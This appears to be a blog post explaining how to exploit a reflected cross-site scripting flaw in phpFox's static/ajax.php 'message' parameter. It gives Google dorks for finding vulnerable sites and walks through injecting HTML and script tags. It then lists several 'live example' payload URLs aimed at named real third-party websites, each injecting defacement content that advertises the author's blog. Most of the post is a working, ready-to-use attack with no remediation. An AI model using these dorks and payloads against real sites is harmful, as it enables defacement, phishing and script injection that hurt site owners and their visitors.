phpFox (ajax.php) XSS Vulnerability

PhpFox is a Php Script For Making Social Networking website, Similiar to Facebook.
3.1 and some other versions of PhpFox are vulnerable For XSS



 Google Dork :

    "intext:© · English (US) Powered By phpFox Version 3.0.1."
     "inurl:/static/ajax.php?core"



Open any website for search results with text :© · English (US) Powered By phpFox Version 3.0.1
or url xyz.com/static/ajax.php?core
now You'll Get something Like This URL give below

    http://anonymous1769.blogspot.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">some message here&core[security_token]=99d754d2b583565369e194e30eaabcbc


Now Chnage the Text &Message= blah blah blah....  (you have to replace the red text with your html Tags)
for example

    http://anonymous1769.blogspot.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=
        <center><font color="red"><h2>XSS</h2><br><h1>www.anonymous1769.blogspot.in</h1><a href='http://anonymous1769.blogspot.in'><img src="http://i55.tinypic.com/14uuv14.png"/>
    &core[security_token]=99d754d2b583565369e194e30eaabcbc


You can use multiple html Tags, and scripts here For details Check This Post

Live examples :

    http://onlinesocial.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<center><font color="red"><h2>XSS</h2><br><h1>www.anonymous1769.blogspot.in</h1><a href='http://anonymous1769.blogspot.in'><img src="http://i55.tinypic.com/14uuv14.png"/>&core[security_token]=99d754d2b583565369e194e30eaabcbc
    http://www.marshable.net/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=    <center><font color="red"><h2>XSS</h2><br><h1>www.anonymous1769.blogspot.in</h1><a href='http://anonymous1769.blogspot.in'><img src="http://i55.tinypic.com/14uuv14.png"/>
    http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20<center><font%20color="red"><h2>XSS</h2><br><h1>www.anonymous1769.blogspot.in</h1><a%20href='http://anonymous1769.blogspot.in'><img%20src="http://i55.tinypic.com/14uuv14.png"/>
    http://mstudio84.com/gist/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.anonymous1769.blogspot.in%3C/h1%3E%3Ca%20href='http://anonymous1769.blogspot.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E
    http://parsdb.ir/accessories/social_network/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.anonymous1769.blogspot.in%3C/h1%3E%3Ca%20href='http://anonymous1769.blogspot.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E
    http://sohiran.ir/fb/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.anonymous1769.blogspot.in%3C/h1%3E%3Ca%20href='http://anonymous1769.blogspot.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E